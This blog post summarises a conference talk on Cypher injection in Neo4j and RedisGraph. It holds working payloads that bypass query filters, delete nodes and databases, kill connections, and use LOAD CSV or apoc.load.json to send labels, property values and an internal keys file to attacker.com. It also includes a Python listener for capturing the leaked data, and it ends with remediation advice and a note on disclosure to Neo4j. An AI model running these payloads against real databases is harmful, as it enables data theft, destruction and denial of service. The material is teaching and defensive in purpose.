
Conference notes: Cypher Query Injection - the new “SQL Injection”

Posted in Conference notes on November 29, 2022


Hi! This week’s conf’notes are from ‘Cypher Query Injection - the new “SQL Injection” we aren’t aware of’ by Noy Pearl at BSides TLV and BSides Orlando.


TL;DR

This is an excellent introduction to Cypher injection in graph databases like Neo4j. Noy Pearl breaks down everything from the basics to advanced exploitation, sharing her own research and a playground for practice.

Intro to Cypher & Graph Databases

What is Cypher?

  • Cypher is short for (Open) Cypher Query Language
  • It’s commonly used in Graph databases
Comments
  • Cypher is Neo4j’s graph query language that lets you retrieve data from the graph. It’s like SQL for graphs.
  • It was originally intended to be used with Neo4j, but was opened up through the openCypher project. It is now used by many other databases including RedisGraph, Spark, Amazon Neptune and SAP HANA Graph.
  • Cypher Query Language Reference, Version 9

What is a Graph database?

                    Relational database            Graph database
Vendor examples     MySQL, Microsoft SQL Server    Neo4j, RedisGraph, Amazon Neptune
What it looks like  Tables, rows, columns          Graphs, nodes, relationships

Graph example:

What is a Cypher Query?

Terms:

Node, Relationship & Node: (node)-[:RELATIONSHIP]->(node)

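Variable, Label & Property: (c:Character {name: 'Spongebob'}), where c is the variable, Character the label and name a property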

Query example:

  • MATCH ... RETURN is roughly the equivalent of SELECT ... FROM in SQL
  • Get all Characters:
MATCH (c:Character) RETURN c
  • Get Character by name:
MATCH (c:Character)
WHERE c.name = 'Spongebob'
RETURN c

Cypher injection

Basic SQL injection

Vulnerable query

SELECT * FROM "characters" WHERE name = "Spongebob"

returns only the Spongebob row.

Injection
If name is based on user input, injecting Spongebob" OR 1=1-- will change the query to:

SELECT * FROM "characters" WHERE name = "Spongebob" OR 1=1--"

It’ll return every row in the table, because 1=1 is always true and -- comments out the trailing quote.
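To see the same bug end to end, here is a minimal Python sketch using the standard-library sqlite3 module. The table contents and function names are hypothetical. Standard SQL reserves double quotes for identifiers, so the sketch uses single quotes for the string literal, which makes the payload Spongebob' OR 1=1--. A parameterized variant is included for contrast.

```python
import sqlite3

# Hypothetical in-memory table mirroring the "characters" example above.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE characters (name TEXT, job TEXT)")
conn.executemany(
    "INSERT INTO characters VALUES (?, ?)",
    [("Spongebob", "Fry cook"), ("Patrick", "None"), ("Squidward", "Cashier")],
)


def find_vulnerable(name: str) -> list:
    # User input is pasted straight into the SQL text: this is the bug.
    query = "SELECT * FROM characters WHERE name = '" + name + "'"
    return conn.execute(query).fetchall()


def find_parameterized(name: str) -> list:
    # The ? placeholder keeps the input as data, never as SQL syntax.
    return conn.execute("SELECT * FROM characters WHERE name = ?", (name,)).fetchall()


payload = "Spongebob' OR 1=1--"
print(len(find_vulnerable("Spongebob")))  # 1 row
print(len(find_vulnerable(payload)))      # 3 rows: the WHERE clause is always true
print(len(find_parameterized(payload)))   # 0 rows: no character has that literal name
```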

Basic Cypher injections

MATCH By Name - Vulnerable query

MATCH (c:Character)
WHERE c.name = '" + USER_INPUT + "' RETURN c

// E.g. return the node that has the name Spongebob:
MATCH (c:Character)
WHERE c.name = 'Spongebob' RETURN c

MATCH By Name injection - Return all
Injecting Spongebob' or 1=1 RETURN c// will change the query to:

MATCH (c:Character)
WHERE c.name = 'Spongebob' or 1=1 RETURN c//' RETURN c

which returns all Character nodes, whatever their name.

This is the equivalent of the previous SQL injection example.
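The string manipulation behind this payload can be reproduced without a database. The Python sketch below assumes hypothetical application code that concatenates user input into a single-line version of the vulnerable query. It also applies a naive "cut at //" step to show what Cypher effectively parses, since // starts a line comment. That step ignores // inside string literals, which is good enough for this example only.

```python
# Hypothetical application code that builds the Cypher query by concatenation,
# in the same shape as the vulnerable query above (single-line form).
def build_query(user_input: str) -> str:
    return "MATCH (c:Character) WHERE c.name = '" + user_input + "' RETURN c"


def strip_line_comment(query: str) -> str:
    # Cypher treats the rest of the line after // as a comment.
    # Naive: assumes // never appears inside a string literal.
    return query.split("//", 1)[0].rstrip()


benign = build_query("Spongebob")
injected = build_query("Spongebob' or 1=1 RETURN c//")

print(benign)
print(injected)
print(strip_line_comment(injected))
```

The second print shows the full injected text, and the third shows the part that is actually executed: the original trailing ' RETURN c has been commented away.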

Problem
In order to inject RETURN c, we need to know there is a variable called c (but more on that in a sec).

MATCH By Name injection - Delete node
Vulnerable query:

MATCH (c:Character)
WHERE c.name = '" + USER_INPUT + "' RETURN c

Injecting Spongebob' DELETE c// will change the query to:

MATCH (c:Character)
WHERE c.name = 'Spongebob' DELETE c//' RETURN c

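which deletes the node. (Neo4j refuses to DELETE a node that still has relationships; DETACH DELETE c removes the node together with its relationships.)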

MATCH By Name injection - Delete everything
Vulnerable query:

MATCH (c:Character)
WHERE c.name = '" + USER_INPUT + "' RETURN c

Injecting Spongebob' MATCH (all:Character) DELETE all// will change the query to:

MATCH (c:Character)
WHERE c.name = 'Spongebob' MATCH (all:Character) DELETE all//' RETURN c

We inserted two clauses (MATCH & DELETE). This creates a variable called all to get all the nodes that have a label called Character, then deletes them.

Problem
In black-box testing we can’t see the query, so we don’t know that there is a label called Character.
The solution is to leak this data by leveraging a legitimate Neo4j feature called LOAD CSV.

Data exfiltration via LOAD CSV in Neo4j

Blind Cypher injection

  • We’re basically trying to exploit a blind Cypher injection, which is when we’re able to inject into a query but don’t see the reply

LOAD CSV

  • Used to import data from CSV files (possibly from external files)
  • Syntax: LOAD CSV FROM 'https://your-website/data.csv' AS row
  • Interesting because it sends a GET request to an external service (that we can define)
  • So it enables leaking data from the database to a server we control

Using LOAD CSV to leak Labels

Payload to leak all labels:

CALL db.labels() YIELD label
LOAD CSV FROM 'https://attacker.com/'+label
AS b RETURN b//

What this does:

  • Calls the procedure db.labels() which returns all labels in the database
  • Uses LOAD CSV & appends the label at the end of the URL. This sends a GET request to our server with the leaked label in the path (one request per label).

Notice the User-Agent is NeoLoadCSV_Java.
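The "server we control" can be very small. Below is a hedged Python sketch that uses only http.server. It records the decoded path and User-Agent of every GET, and the path is where the LOAD CSV payloads put the leaked label, property names or values. Port 8000 and the names ExfilHandler, received and make_server are illustrative assumptions. The sketch speaks plain HTTP, so a payload aimed at it would use an http:// URL rather than https://.

```python
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import unquote

# Everything the listener has received, as (decoded path, User-Agent) pairs.
received = []


class ExfilHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        # LOAD CSV puts the leaked value in the URL path, e.g. GET /Character
        leaked = unquote(self.path.lstrip("/"))
        received.append((leaked, self.headers.get("User-Agent", "")))
        # Reply with an empty 200 so the request completes cleanly.
        self.send_response(200)
        self.send_header("Content-Length", "0")
        self.end_headers()

    def log_message(self, fmt, *args):
        # Silence the default per-request logging to stderr.
        pass


def make_server(port: int = 8000) -> HTTPServer:
    return HTTPServer(("0.0.0.0", port), ExfilHandler)


# To run it: make_server().serve_forever(), then point the payload URL at this host.
```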

Using LOAD CSV to leak Properties

We know there is a label called Character.
Payload to leak its properties:

MATCH (c:Character)
LOAD CSV FROM 'https://attacker.com/'+apoc.text.join(keys(c), '')
AS b RETURN b//

What this does:

  • Uses keys() to return the property names of each node that has the label Character
  • Uses apoc.text.join to transform that list into a string (so we can append it at the end of the URL)
  • Uses LOAD CSV to send the property names to your server (one GET request is sent per Character node, with all of that node’s property names concatenated in the path)
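Because MATCH produces one row per node, the payload fires one request per Character node rather than one per property. The Python sketch below simulates the URL each row would produce. The nodes are hypothetical property maps, and Neo4j does not guarantee the order of keys(). It also shows why the empty separator makes the result ambiguous ("namejob"). Joining with a separator such as "," is a variation of the talk's payload, not part of it.

```python
# Two hypothetical Character nodes, represented as property maps.
nodes = [
    {"name": "Spongebob", "job": "Fry cook"},
    {"name": "Patrick"},
]


def keys_join_url(node: dict, base: str = "https://attacker.com/", sep: str = "") -> str:
    # Mirrors 'https://attacker.com/' + apoc.text.join(keys(c), '') for one node.
    # Python dicts keep insertion order; Neo4j's keys() order is not guaranteed.
    return base + sep.join(node.keys())


# One URL (one GET request) per matched node, not per property.
urls = [keys_join_url(n) for n in nodes]
print(urls)
```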

Using LOAD CSV to leak Values of a Property

We know there is a label called Character & a property called name.
Payload to leak the names (i.e. values of the property name):

MATCH (c:Character)
LOAD CSV FROM 'https://attacker.com/'+c.name
AS b RETURN b//

Attack escalation

Denial of Service - Preventing access to the database

Leak & Kill connections

  1. Call dbms.listConnections() to get all connection IDs:
CALL dbms.listConnections()
  2. Use LOAD CSV to leak them to your server
  3. Kill a connection with dbms.killConnection:
CALL dbms.killConnection("bolt-9276")
  4. Or kill a list of connections at once with dbms.killConnections:
CALL dbms.killConnections(["bolt-9276", "bolt-9273"])

Impact:

  • We’re killing the connections between the server and the database (it’s not a client-side attack).
  • So using an automated script, we could prevent queries of legitimate users from being executed, leading to DoS.
  • But it’ll depend on the role & permissions you have when injecting. If your role is admin, a simple injection using LOAD CSV is enough to perform this DoS attack.
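The "automated script" step can be as small as turning the connection IDs that reached your server into the killConnections call. The Python sketch below builds that statement string. The IDs are hypothetical, and reusing json.dumps as a list-literal formatter is a shortcut that holds for simple IDs like these.

```python
import json


def kill_statement(connection_ids: list) -> str:
    # json.dumps renders a list of plain strings as ["a", "b"], which is
    # also a valid Cypher list literal for simple IDs like these.
    return "CALL dbms.killConnections(" + json.dumps(connection_ids) + ")"


# Hypothetical IDs, as they might arrive at your server after the LOAD CSV leak.
leaked_ids = ["bolt-9276", "bolt-9273"]
print(kill_statement(leaked_ids))
```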

Drop database

  1. List all databases:
SHOW DATABASES
  2. Use LOAD CSV to leak their names to your server
  3. Drop databases:
DROP DATABASE spongebob

SSRF & RFI - Accessing sensitive endpoints & files

Leveraging LOAD CSV for SSRF

  • Cypher injection can be exploited for SSRF
  • By injecting LOAD CSV FROM <url-of-internal-server>, you can make the vulnerable server send requests to internal servers and access hidden endpoints, enumerate directories and files, leak data to your server, etc.

Lateral movement in the cloud

  • Use LOAD CSV FROM to query the AWS metadata service to find out to which other machine(s) you can escalate your attack
  • If you can query AWS Secrets Manager, you can also get a lot of sensitive files and passwords from it
  • But this only works with IMDSv1
  • IMDSv2 requires a session token, obtained with a PUT request, to be passed in the X-aws-ec2-metadata-token HTTP request header before the metadata service answers queries. Noy didn’t find a way to include this token in the GET requests sent by LOAD CSV FROM.
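To make the IMDSv2 limitation concrete, here is a Python sketch (standard library only) that builds, but does not send, the two requests IMDSv2 expects:

  • a PUT to /latest/api/token carrying a TTL header
  • a GET carrying the returned token in X-aws-ec2-metadata-token

The 21600-second TTL and the placeholder token are illustrative. Both steps need things a plain LOAD CSV FROM GET does not offer, at least as far as the talk found: a non-GET method and custom request headers.

```python
import urllib.request

IMDS = "http://169.254.169.254"


def imdsv2_token_request(ttl_seconds: int = 21600) -> urllib.request.Request:
    # Step 1: IMDSv2 hands out a session token only in response to a PUT.
    return urllib.request.Request(
        IMDS + "/latest/api/token",
        method="PUT",
        headers={"X-aws-ec2-metadata-token-ttl-seconds": str(ttl_seconds)},
    )


def imdsv2_metadata_request(token: str, path: str = "/latest/meta-data/") -> urllib.request.Request:
    # Step 2: every metadata GET must carry the token in a custom header.
    return urllib.request.Request(IMDS + path, headers={"X-aws-ec2-metadata-token": token})


# Building Request objects does not send them; nothing here contacts AWS.
put_req = imdsv2_token_request()
get_req = imdsv2_metadata_request("example-token")
print(put_req.get_method(), get_req.get_method())
```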

Leak secrets through SSRF

Let’s say there is an internal endpoint that hosts a sensitive file, http://localhost:3030/internal-api/keys.txt.

Cypher injection can be exploited to leak the secret in this file:

LOAD CSV FROM "http://localhost:3030/internal-api/keys.txt"
AS secret
LOAD CSV FROM "http://attacker.com/"+secret[0]
AS LINE RETURN secret[0]//

What this does:

  • The first LOAD CSV FROM fetches the secret file from the internal server and binds each of its lines to secret (as a list of comma-separated fields)
  • The second LOAD CSV FROM sends a request to our server with the secret (secret[0], the first field of each line) appended to the URL

Note that:

  • This works even if the Neo4j database and the sensitive file are hosted on different servers
  • The filetype doesn’t matter (it doesn’t have to be CSV)
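LOAD CSV hands each line to the query as a list of fields, which is why the payload uses secret[0]. The Python sketch below approximates that behaviour with the standard csv module to show which URLs the second LOAD CSV would request. The file contents are hypothetical, and Neo4j's own CSV parser may differ in edge cases such as quoting or blank lines. Note how a comma inside a secret cuts the leaked value short.

```python
import csv
import io


def exfil_urls(file_text: str, attacker: str = "http://attacker.com/") -> list:
    # Approximates LOAD CSV without WITH HEADERS: each line becomes a list of
    # comma-separated fields, bound to `secret` in the payload.
    urls = []
    for secret in csv.reader(io.StringIO(file_text)):
        if not secret:
            continue  # csv.reader yields [] for blank lines; this sketch skips them
        # "http://attacker.com/" + secret[0]: only the first field is leaked.
        urls.append(attacker + secret[0])
    return urls


# Hypothetical contents of keys.txt on the internal server.
keys_txt = "API_KEY=abc123\nDB_PASSWORD=hunter2,backup\n"
for url in exfil_urls(keys_txt):
    print(url)
```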

Responsible disclosure to Neo4j

  • Noy alerted Neo4j about the risks of having LOAD CSV enabled because there is no way to disable it
  • They’re working on a solution but it’s not simple: LOAD CSV is defined as a clause not a function, and it is not possible to disable clauses (while it is possible to disable functions)

Alternative to LOAD CSV

  • Neo4j APOC Library extends the functionality and Cypher language of Neo4j databases
  • It provides more features including procedures to Import / Load and Export data
  • apoc.load.json can be used if LOAD CSV is blocked to leak the same information:
MATCH (c:Character)
CALL apoc.load.json("https://attacker.com/data.json?leaked="+c.name)
YIELD value RETURN value//
  • This requires APOC to be installed in the database. Chances are it is, since APOC is considered the largest and most widely used Neo4j library
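With apoc.load.json the leaked value arrives in the query string (?leaked=...) instead of the path. On the receiving server, a hedged Python sketch for pulling it back out could look like the one below. The function name is hypothetical, and the parameter name leaked simply matches the payload above. parse_qs also undoes percent-encoding if the value arrives encoded.

```python
from urllib.parse import parse_qs, urlsplit


def leaked_values(request_path: str) -> list:
    # The apoc.load.json payload requests /data.json?leaked=<c.name>;
    # parse_qs splits the query string and percent-decodes each value.
    return parse_qs(urlsplit(request_path).query).get("leaked", [])


print(leaked_values("/data.json?leaked=Spongebob"))
```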

Remediation & Mitigation

Remediation

  • Use Parameterized Queries
// Not vulnerable (parameterized query)
session.run("MATCH (c:Character) WHERE c.name = $name RETURN c", { name: name })

// Vulnerable (user input concatenated into the Cypher query)
session.run("MATCH (c:Character) WHERE c.name = '" + name + "' RETURN c")

Mitigations

  • Neo4j supports RBAC - users, roles & privileges
    • Read / write
    • Built-in granular roles - PUBLIC, reader, editor, publisher, … admin
    • Revoke privileges from roles
    • Hardening capabilities per-user
  • Disable/blocklist APOC procedures (like LOAD, IMPORT, EXPORT…) in neo4j.conf (since version 4.3)
  • Uninstall APOC if it’s not used

RedisGraph

  • Extension to Redis that enables writing Cypher queries
  • Supports some procedures (e.g. db.labels)
  • Supports substrings
  • No equivalent of LOAD CSV, but CASE WHEN can be used for Cypher injection (if-based, with OR 1=2)
    • E.g. get labels with db.labels and check whether the first letter equals ‘a’ (using OR 1=2 to get the result if it’s a blind injection)
  • Supports parameterized queries
  • Doesn’t support RBAC
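The "check whether the first letter equals ‘a’" idea extends to full boolean-based blind extraction: ask one yes/no question per candidate character and keep whatever answers yes. The Python sketch below shows only the extraction loop. The oracle is simulated locally; in a real test each call would be one injected request, with a CASE WHEN / OR 1=2 payload whose exact RedisGraph syntax is not shown here. The alphabet and maximum length are assumptions.

```python
import string
from typing import Callable

# Characters tried at each position; an assumption, extend as needed.
ALPHABET = string.ascii_letters + string.digits + "_"


def extract(oracle: Callable[[int, str], bool], max_len: int = 64) -> str:
    """Recover a hidden string one character at a time.

    oracle(i, ch) stands in for one injected request whose response reveals
    whether "character i of the target equals ch" is true.
    """
    recovered = ""
    for i in range(max_len):
        for ch in ALPHABET:
            if oracle(i, ch):
                recovered += ch
                break
        else:
            break  # no candidate matched: assume we reached the end
    return recovered


# Simulated target standing in for a label returned by db.labels().
SECRET_LABEL = "Character"


def simulated_oracle(i: int, ch: str) -> bool:
    return i < len(SECRET_LABEL) and SECRET_LABEL[i] == ch


print(extract(simulated_oracle))
```

A linear scan costs up to len(ALPHABET) requests per character. Comparing characters with < or > instead would allow a binary search, at the price of a more complex payload.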

What now

  • Practice: cypher-playground
  • Fix existing injections in your apps & Reduce attack surface
  • Hunt for Cypher injection on bug bounty programs

